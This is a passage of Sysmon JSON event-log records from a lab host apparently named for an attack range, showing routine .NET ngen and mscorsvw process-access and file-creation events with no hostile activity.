06:00:04.122","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-0010E2A01100}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7825,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.122\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-0010E2A01100}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.122","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-0010E2A01100}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7826,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.137\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-0010E2A01100}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.137","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-0010E2A01100}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7827,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:04.184\r\nProcessGuid: {A837DB8D-04E4-5F25-0000-0010E2A01100}\r\nProcessId: 3356\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d1c-0\\System.Web.ApplicationServices.dll\r\nCreationUtcTime: 2020-08-01 06:00:04.184","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:04.184","ProcessGuid":"{A837DB8D-04E4-5F25-0000-0010E2A01100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d1c-0\\System.Web.ApplicationServices.dll","CreationUtcTime":"2020-08-01 06:00:04.184","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7828,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.215\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00106DA41100}\r\nTargetProcessId: 1440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.215","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00106DA41100}","TargetProcessId":"1440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7829,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00106DA41100}\r\nTargetProcessId: 1440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00106DA41100}","TargetProcessId":"1440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7830,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00106DA41100}\r\nTargetProcessId: 1440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00106DA41100}","TargetProcessId":"1440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7831,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00102EA81100}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00102EA81100}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7832,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00102EA81100}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00102EA81100}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7833,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.418\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00102EA81100}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 